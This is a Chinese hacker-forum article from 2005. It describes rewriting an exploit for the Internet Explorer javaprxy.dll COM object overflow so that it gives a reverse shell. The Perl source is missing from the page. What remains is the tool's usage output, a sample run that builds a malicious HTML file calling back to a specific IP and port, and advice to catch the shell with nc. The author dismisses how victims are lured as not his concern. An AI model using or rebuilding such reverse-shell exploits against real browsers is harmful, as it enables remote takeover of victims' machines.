| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | 

您现在的位置: 中国X黑客小组 >> 技术文章 >> 安全防御 >> 漏洞分析 >> 文章正文 用户登录 新用户注册
  [组图]IE javaprxy.dll COM Object漏洞利用程序改写手记         ★★★ 【字体:
IE javaprxy.dll COM Object漏洞利用程序改写手记
作者:无敌最寂…    文章来源:邪恶八进制    点击数:    更新时间:2005-7-10    

Microsoft Internet Explorer javaprxy.dll COM Object 溢出漏洞是前两天刚刚公布的,类似这样的漏洞我在以前也发过一个。这个漏洞的原理我不多说,总之又是IE的一个洞洞。漏洞利用方式依然采用暴力扩大内存的方式,我这里修改主要针对shellcode做了修改。
本地监听的shellcode没什么利用价值,还是反向的来得舒服。但是这个shellcode修改不是那么容易的是,为了防止shellcode被unicode编码所以要采用点小措施来方法。

整个程序我已经写出来了,如下,完全perl代码:


Code:

[Ctrl+A Select All]



程序的帮助信息如下:


H:\temp>doomie.pl
    Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit

          connect back shell rewritten by 无敌最寂寞[EST]

Usage:
    doomie.pl <connect-back-ip> <connect-back-port> [destination file]

Attention:if [destination file] is omitted,superlone.html will be default!

[-]ERROR! connect back ip must be specified!


参数前两个我就不用多说了吧,最后一个是要生成的文件的文件名,比如dest.html,如果省略默认的文件名是superlone.html。

好,我们来实际生成一个看看:

H:\temp>doomie.pl 222.133.151.197 1314
    Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit

          connect back shell rewritten by 无敌最寂寞[EST]

Usage:
    doomie.pl <connect-back-ip> <connect-back-port> [destination file]

Attention:if [destination file] is omitted,superlone.html will be default!

[+]Generating Shellcode ......DONE
[+]Creating exploitable file ......DONE

CHECK if it does WORK!

这样在程序的同目录下生成了一个默认文件名superlone.html的文件。
用ie打开它就会引发溢出,如果你 lucky enough,那就去你的nc检查一下看看是不是得到shell了吧。。
至于怎么让目标机器运行,那是你的事啦,与我无关的说!

以下是我在远程机器上测试后的截图,在此我要感谢论坛的xyzreg兄帮忙测试:


这是我本机监听的nc的截图:

 附件:doomie.rar

文章录入:IceRiver    责任编辑:admin 
  • 上一篇文章:

  • 下一篇文章:
  • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    最新热点 最新推荐 相关文章
    破解Session cookie的方法
    浏览器市场IE份额跌至63.9% 
    不怕被钓鱼 关掉IE 7反钓鱼功
    Safari在处理Java Applet的下
    轻轻松松铲除恶意网站 实战I
    攻陷AJAX
    安全专家:Web 2.0站点的coo
    黑帽大会研究人员展示如何攻
    永远不怕IE主页被修改
    IE仍然是过去影响力最高的科
      网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!)
    Powered by ICE RIVER - STUDIO
    » CnXHacker.CoM   © CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved.